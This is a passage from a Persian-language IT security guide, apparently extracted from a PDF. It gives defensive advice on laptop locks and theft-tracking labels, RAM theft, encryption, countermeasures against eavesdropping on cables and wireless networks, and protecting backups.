ﻗﻔﻠﻬﺎ ﺑﻴﺸﺘﺮ ﻣﺎﻧﻊ ﻗﺎﭘﻴﺪﻩ ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺗﻮﺳﻂ ﺩﺯﺩﻫﺎﻱ ﺧﻴﺎﺑﺎﻧﻲ ﻣﻲﺷﻮﻧﺪ.
ﺑﺮﭼﺴﺐﺯﺩﻥ
ﻳﻚ ﺭﺍﻩ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﺳﺮﻗﺖ ﻭ ﺍﻓﺰﺍﻳﺶ ﺍﺣﺘﻤﺎﻝ ﺑﺎﺯﭘﺲ ﻓﺮﺳﺘﺎﺩﻥ ﺭﺍﻳﺎﻧﻪ ﻛﻴﻔﻲ ،ﺣﻜﺎﻛﻲ ﻧﺎﻡ ﻭ ﺷﻤﺎﺭﻩ ﺗﻠﻔﻦ ﻳﺎ ﺑﺮﭼـﺴﺐ ﺯﺩﻥ
ﺭﻭﻱ ﺁﻥ ﺗﻮﺳﻂ ﺑﺮﭼﺴﺐﺯﻧﻬﺎﻱ ﺛﺎﺑﺖ ﻳﺎ ﻧﻴﻤﻪﺛﺎﺑﺖ ﺍﺳﺖ .ﻭﺟﻮﺩ ﺍﻳﻦ ﺑﺮﭼﺴﺒﻬﺎ ،ﺍﺩﻋﺎﻱ ﻋﺪﻡ ﺍﻃﻼﻉ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻳـﺎ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺍﺯ ﻣـﺴﺮﻭﻗﻪ
ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﺴﻴﺎﺭ ﺳﺨﺖ ﻣﻲﻛﻨﺪ.
ﺑﺮﭼﺴﺒﻬﺎﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﺯﻧﻲ ﺧﻮﺏ ﺑﻪ ﻭﺿﻮﺡ ﻗﺎﺑﻞ ﺭﺅﻳﺖ ﻫﺴﺘﻨﺪ ﻭ ﺷﻤﺎﺭﺓ ﺳﺮﻱ ﺍﺧﺘﺼﺎﺻﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻮﺟﺐ ﻣﻲﺷـﻮﺩ ﺳـﺎﺯﻣﺎﻥ
ﺑﺘﻮﺍﻧﺪ ﻣﺸﺨﺼﺎﺕ ﺁﻧﺮﺍ ﺭﺩﻳﺎﺑﻲ ﻛﻨﺪ .ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﭼﺴﺐﮔﺬﺍﺭﻱ ﻛﻢﻫﺰﻳﻨﻪ ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺖ ﺭﺩﻳﺎﺑﻲ ﺍﻣﻦ ﻭﺳﺎﻳﻞ ﺩﻓﺘـﺮﻱ ) ٥٨(STOPﺗﻮﻟﻴـﺪ
ﺷﺪﻩ ﺍﺳﺖ .ﺑﻪ ﺍﻳﻦ ﺑﺮﭼﺴﺒﻬﺎ ﺷﻤﺎﺭﺓ ﺳﺮﻱ ﺍﺧﺘﺼﺎﺻﻲ ﺗﻌﻠﻖ ﮔﺮﻓﺘﻪ ﻭ ﺑﺎ ﭘﺸﺘﻴﺒﺎﻧﻲ ۳ﺳﺎﻟﻪ ﺩﺭ ﺍﺭﻭﭘﺎ ،ﺍﺳﺘﺮﺍﻟﻴﺎ ،ﺁﻣﺮﻳﻜﺎﻱ ﻻﺗـﻴﻦ ،ﻭ ﺁﻣﺮﻳﻜـﺎﻱ
ﺷﻤﺎﻟﻲ ﻫﻤﺮﺍﻩ ﺍﺳﺖ .ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻗﻄﻌﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺑﺎ ﺑﺮﭼﺴﺐ STOPﭘﻴﺪﺍ ﺷﻮﺩ ،ﺷﺮﻛﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺗﺮﺗﻴﺒﻲ ﺑﺪﻫﺪ ﻛـﻪ ﺑـﻪ ﻣﺎﻟـﻚ ﺍﺻـﻠﻲ
ﺑﺎﺯﮔﺸﺖ ﺩﺍﺩﻩ ﺷﻮﺩ.
ﺳﺮﻗﺖ ﺍﺟﺰﺍﺀ
ﺯﻣﺎﻧﻴﻜﻪ ﻗﻴﻤﺖ RAMﺑﺎﻻ ﺑﻮﺩ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻭ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﺍﺯ ﺩﺯﺩﻳﻬـﺎﻱ ﻣﺘـﻮﺍﻟﻲ RAMﺭﻧـﺞ ﻣـﻲﺑﺮﺩﻧـﺪ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ ﻭ
ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﺎﻫﺪ ﺩﺯﺩﻳﻬﺎﻱ ﺑﺰﺭﮒ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﺑﻮﺩﻩﺍﻧﺪ RAM .ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﺁﺧﺮﻳﻦ ﻣـﺪﻝ ﺑﺮﺍﺣﺘـﻲ ﺩﺭ ﺑـﺎﺯﺍﺭ
ﺁﺯﺍﺩ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ .ﺍﻳﻦ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺭﺩﻳﺎﺑﻲ ﻫﺴﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺳﺎﺭﻗﻴﻦ ﺗﻨﻬـﺎ ﻗـﺴﻤﺘﻲ ﺍﺯ RAMﺩﺍﺧـﻞ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ
ﻣﻲﺩﺯﺩﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻔﺘﻪﻫﺎ ﻳﺎ ﻣﺎﻫﻬﺎ ﺑﮕﺬﺭﺩ ﺗﺎ ﻣﻮﺿﻮﻉ ﺁﺷﻜﺎﺭ ﺷﻮﺩ .ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺷﻜﺎﻳﺖ ﻛﻨﺪ ﻛﻪ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﻧﺎﮔﻬـﺎﻥ ﺑـﺴﻴﺎﺭ
ﺁﻫﺴﺘﻪﺗﺮ ﺍﺯ ﺁﻧﭽﻪ ﺩﻳﺮﻭﺯ ﻛﺎﺭ ﻣﻲﻛﺮﺩ ﻛﺎﺭ ﻣﻲﻛﻨﺪ RAM ،ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ،ﻭ ﺳﭙﺲ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳـﺎ caseﺁﻥ ﺍﺯ ﺍﻳﻤﻨـﻲ ﻓﻴﺰﻳﻜـﻲ
ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﻳﺎ ﻧﻪ.
ﺭﻣﺰﮔﺬﺍﺭﻱ
ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ﺑﺎﺷﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﺩﺭ ﺭﺍﺳﺘﺎﻱ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺍﻫﺪﺍﻑ ﺻﺎﺣﺐ ﺟﺪﻳﺪ ﺭﺍﻳﺎﻧﻪ ﺑﻜﺎﺭ ﺧﻮﺍﻫـﺪ
ﺭﻓﺖ .ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﭘﺎﻙ ﻛﻨﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﺑﺨﻮﺍﻧﻨﺪ .ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻓﺮﻭﺵ ﺑﺮﺳﺪ ،ﻳﺎ ﺩﺭ ﻧﺎﻣـﻪﭘﺮﺍﻛﻨـﻲﻫـﺎﻱ
ﺑﺪﻧﺎﻡ ﻛﻨﻨﺪﻩ ﻭ ﻳﺎ ﺩﺭ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﺎﻳﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻜﺎﺭ ﺭﻭﺩ.
ﻼ ﺩﻭﺭ ﻧﮕﻪ ﺩﺍﺷﺖ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ﺭﺍ ﺗﻘﺮﻳﺒﹰﺎ ﺑﻲﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ؛ ﺑﺮﺍﻱ ﺍﻳـﻦﻫﻴﭽﮕﺎﻩ ﻧﻤﻲﺗﻮﺍﻥ ﭼﻴﺰﻱ ﺭﺍ ﺍﺯ ﺳﺮﻗﺖ ﻛﺎﻣ ﹰ
ﻣﻨﻈﻮﺭ ﮐﺎﻓﻲ ﺍﺳﺖ ﺩﺳﺘﮕﺎﻩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﺪ ﻭ ﺳﺎﺭﻕ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﻧﺪﺍﻧﺪ .ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ،ﺣﺘﻲ ﺑﺎ ﺑﻬﺘـﺮﻳﻦ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﺍﻣﻨﻴـﺖ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺑﺎﺯﺩﺍﺭﻧﺪﻩﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ،ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻧﻈﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻪ ﺷﻜﺴﺘﻦ ﺁﻥ ﻣـﺸﻜﻞ ﺑﺎﺷـﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ
ﺷﻮﻧﺪ .ﺗﻮﺻﻴﻪ ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻗﻮﻱ ﺍﺳﺖ ﺗﺎ ﺣﺘﻲ ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﺗﺎﻥ ﺑﻪ ﺳـﺮﻗﺖ ﺭﻓـﺖ ،ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺳﻲ ﻛـﻪ ﺩﺭ ﺁﻥ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺮﺍﺣﺘﻲ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺳﻮﺀ ﻭﺍﻗﻊ ﻧﺸﻮﺩ.
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ
ﻫﻤﭙﻮﺷﺎﻧﻲ ﺯﻳﺎﺩﻱ ﻣﻴﺎﻥ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺩﻩﻫﺎﻳﺘـﺎﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﺍﺯ ﻫﻤـﺔ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﻳﻨﻬﺎ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﻛﺴﻲ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﺭﺍ ﺑﺪﺯﺩﺩ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺁﻧـﺮﺍ ﻧﻴـﺰ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ .ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺩﺍﺩﻩﻫـﺎﻱ ﺷـﻤﺎ ﺩﺭ ﻣﻌـﺮﺽ ﺣﻤـﻼﺕ
ﮔﻮﻧﺎﮔﻮﻧﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻗﺪﺍﻣﺎﺕ ﻓﻴﺰﻳﻜﻲ ﻛﻪ ﺩﺭ ﻗﺴﻤﺘﻬﺎﻱ ﻗﺒﻠﻲ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪ ﺭﺍ ﺑﻲﺍﺛﺮ ﻛﻨﻨﺪ.
ﺍﺳﺘﺮﺍﻕﺳﻤﻊ )ﺷﻨﻮﺩ(
ﺷﺎﻳﺪ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻜﻲ ﺍﺯ ﺷﻮﻡﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﺍﻧﺘﺸﺎﺭ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺩﺍﺩﻩﻫﺎ ﺑﺎﺷﺪ .ﺣﺘﻲ ﺑﺎ ﻣﻌﻤـﻮﻟﻲﺗـﺮﻳﻦ ﺗﺠﻬﻴـﺰﺍﺕ ،ﺍﺳـﺘﺮﺍﻕﺳـﻤﻊ
ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺭﻭﻧﻮﺷﺖ ﻛﺎﻣﻞ ﺍﺯ ﺍﻗﺪﺍﻣﺎﺕ ﻗﺮﺑﺎﻧﻲ -ﻓﺸﺮﺩﻩﺷﺪﻥ ﻫﺮ ﺩﻛﻤﻪ ﺭﻭﻱ ﺻﻔﺤﻪﻛﻠﻴـﺪ ﻭ ﻫـﺮ ﻗﻄﻌـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺭﻭﻱ ﺻـﻔﺤﺔ
ﻻ ﻗﺮﺑـﺎﻧﻲ ﺍﺯ ﺣـﻀﻮﺭ ﻣﻬـﺎﺟﻢ
ﻧﻤﺎﻳﺸﮕﺮ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ ﻳﺎ ﺑﻪ ﭼﺎﭘﮕﺮ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ -ﺭﺍ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻛﻨﺪ .ﺩﺭ ﺍﻳﻦ ﻣﻴـﺎﻥ ﻣﻌﻤـﻮ ﹰ
ﺑﻲﺍﻃﻼﻉ ﺍﺳﺖ ﻭ ﺧﻮﺵﺑﺎﻭﺭﺍﻧﻪ ﺑﻪ ﻛﺎﺭ ﺧﻮﺩ ﻣﻲﭘﺮﺩﺍﺯﺩ ﻭ ﻧﻪ ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺑﻠﻜﻪ ﻫﻤﭽﻨﻴﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ ﻭ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﻣﺨﺘﻠـﻒ
ﻛﺴﺐ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﻣﻌﺮﺽ ﺳﺮﻗﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٨٨
ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺩﺭ ﻧﻘﺎﻁ ﻣﺨﺘﻠﻒ ﺭﺍﻳﺎﻧﻪ -ﺍﺗﺼﺎﻝ ﻣﻴﺎﻥ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻭ ﺭﺍﻳﺎﻧﻪ ،ﻛﺎﺑﻠﻬﺎ ﻭ ﺳﻴﻢﻛﺸﻲﻫـﺎﻱ ﺩﺍﺩﻩﻫـﺎ ،ﺷـﺒﻜﻪﻫـﺎﻱ
Ethernetﻭ ﻓﻴﺒﺮﻧﻮﺭﻱ ،ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ،ﻭ ﺣﺘﻲ ﺍﻣﻮﺍﺝ ﺭﺍﺩﻳﻮﻳﻲ ﮔﺬﺭﻧﺪﻩ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ -ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺩﺷـﻮﺍﺭ
ﻛﺮﺩﻥ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
ﻛﺎﺑﻠﻬﺎ ﻭ ﺳﻴﻤﻬﺎﻱ ﺣﺎﻣﻞ ﺩﺍﺩﻩ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺧﺮﺍﺑﻲ ﻳﺎ ﺗﻐﻴﻴﺮﺍﺕ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﻃﻮﺭ ﻣﻨﻈﻢ ﺑﺎﺯﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺑـﻞ ﭘﻮﺷـﺶﺩﺍﺭ ﻳـﺎ •
ﻣﺴﻠﺢ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭﺗﺮ ﻛﺮﺩﻥ ﺍﻳﺠﺎﺩ ﻣﻨﻔﺬ ﺩﺭ ﺳﻴﻤﻬﺎ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﮔﺮ ﺑﻪ ﺍﺻﻮﻝ ﺍﻣﻨﻴﺘﻲ ﺧﻴﻠﻲ ﺍﻫﻤﻴﺖ ﻣﻲﺩﻫﻴﺪ ،ﻛﺎﺑﻠﻬـﺎ ﺭﺍ
ﺩﺭ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻓﻮﻻﺩﻱ ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺩﻓﺎﺗﺮ ﻏﻴﺮ ﻓﻌـﺎﻝ ،ﭘﻮﺭﺗﻬـﺎﻱ Ethernetﻓﻌـﺎﻝ ﻧﺪﺍﺭﻧـﺪ .ﺑﺠـﺎﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ hubﻫـﺎﻱ ،Ethernetﺍﺯ •
٥٩
ﺳﻮﺋﻴﭽﻬﺎﻱ Ethernetﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻨﺘﺮﻝ ﺷﺒﮑﺔ ﻣﺤﻠﻲ ﻣﺎﻧﻨﺪ arpwatchﻛﻪ ﺑﺴﺘﻪﻫﺎﻱ ﺑﺎ ﺁﺩﺭﺱ MAC
ﺑﺪﻭﻥ ﺳﺎﺑﻘﺔ ﻗﺒﻠﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻛﻨﺪ ،ﻳﺎ ﺍﺯ ﺳﻮﺋﻴﭽﻬﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮ ﺍﺳﺎﺱ ﺁﺩﺭﺱ MACﺑﺴﺘﻪﻫﺎ ﺭﺍ ﻏﺮﺑـﺎﻝ ﻛﻨﻨـﺪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻧﻤﺎﻳﻴﺪ .ﻫﺮﺟﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺑﺠﺎﻱ ﻛﺎﺑﻠﻬﺎﻱ ﻣﺴﻲ ،ﺍﺯ ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮ ﻧﻮﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﭼﻮﻥ ﺍﻳﺠﺎﺩ ﻣﻨﻔﺬ ﻣﺨﻔـﻲ ﺩﺭ ﺁﻧﻬـﺎ ﻣـﺸﻜﻠﺘﺮ
ﺍﺳﺖ.
ﺍﺯ ﺑﻜﺎﺭ ﺑﺮﺩﻥ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ .ﺍﮔﺮ ﺣﺘﻤﹰﺎ ﺑﺎﻳﺪ ﻳﻚ ﺷﺒﻜﻪ ﺑﻲﺳﻴﻢ ﺑﺴﺎﺯﻳﺪ ،ﺗﻤﺎﻡ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻤﻨﻲ ﻣﻤﻜﻦ ﺑﺮﺍﻱ ﺩﻓﺎﻉ •
ﺩﺭ ﻋﻤﻖ )ﻣﺜﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ،ﺩﻳﻮﺍﺭﻩ ﺁﺗﺶ ،٦٠ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﭘﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ،٦١SSIDﺻﺎﻓﻲﻫﺎﻱ ،MACﻭ (...ﺭﺍ ﺩﺭ ﺁﻥ ﻓﻌﺎﻝ ﻛﻨﻴﺪ .ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ
ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺍﻳﻤﻨﻲ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ ،ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻣﻮﺯﺵ ﺩﻫﻴﺪ ﺩﺭ ﺷـﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﻫﻤﻴـﺸﻪ ﺍﺯ VPNﻳـﺎ ﺳـﺎﻳﺮ
ﺗﻮﻧﻠﻬﺎﻱ ﺭﻣﺰﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ ٦٢ﺭﺍ ﺧﺎﺭﺝ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ )ﻳﺎ ﻣﻴﺎﻥ ﺩﻭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ( ﻗﺮﺍﺭ ﺩﻫﻴﺪ.
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﺳﺘﺮﺍﻕﺳﻤﻊ ﺣﻔﺎﻇﺖ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﻴﺸﻪ ﺑﺎ ﺍﻳﻦ ﻓﺮﺽ ﻛﻪ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺷـﻤﺎ ﺗﺤـﺖ •
ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ﺗﻤﺎﻡ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﻻﺯﻡ ﺑﺸﻤﺎﺭﻳﺪ .ﻭﻗﺘﻲ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴﺴﺖ ،ﺣﺪﺍﻗﻞ ﻫﻤﻪ ﺗﺮﺍﻓﻴﻚ ﺣـﺴﺎﺱ
ﺷﺒﻜﻪ )ﻣﺜﻞ ﺍﺳﺎﻣﻲ ﻛﺎﺭﺑﺮﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺧﺪﻣﺎﺕ ﺭﺍﻩ ﺩﻭﺭ( ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﺪ.
ﺣﻔﺎﻇﺖ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳﺪ ﭘﻴﺸﻨﻴﺎﺯ ﻫﺮ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ -ﺍﻳﻤﻦ ﻳﺎ ﻏﻴﺮ ﺍﻳﻤﻦ -ﺑﺎﺷﻨﺪ ،ﺍﻣﺎ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺩﺭ ﻧﻮﺍﺭﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ
ﺑﺴﻴﺎﺭ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ .ﺣﺪﺍﻗﻞ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﻩ ﻛﻪ ﺑﻪ ﻃﻮﺭ ﻣﻌﻤﻮﻝ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻳﺘﺎﻥ ﻣﺤﻔﺎﻇـﺖ ﻛﻨﻴـﺪ.
ﻫﻴﭻ ﻭﻗﺖ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻧﺎﺣﻴﺔ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻧﻜﻨﻴﺪ ،ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻣﺤﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﻫﺴﺘﻨﺪ )ﺑﻬﺘـﺮ
ﺍﺳﺖ ﺟﺎﻳﻲ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻞ ﻧﮕﻬﺪﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺘﺎﻥ ﺑﺎﺷﺪ( ﻧﮕﻬﺪﺍﺭﻳﺪ ،ﻭ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ ﺑﻪ ﭼﻪ ﻛﺴﻲ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺯ ﻣﺤﻠـﻲ ﺑـﻪ ﻣﺤـﻞ
ﺩﻳﮕﺮ ﺣﻤﻞ ﻛﻨﺪ.
ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻧﻮﺷـﺘﻪﺷـﺪﻥ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﭘـﺸﺘﻴﺒﺎﻥ ،ﺁﻧﻬـﺎ ﺭﺍ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻛﻨﻴـﺪ.
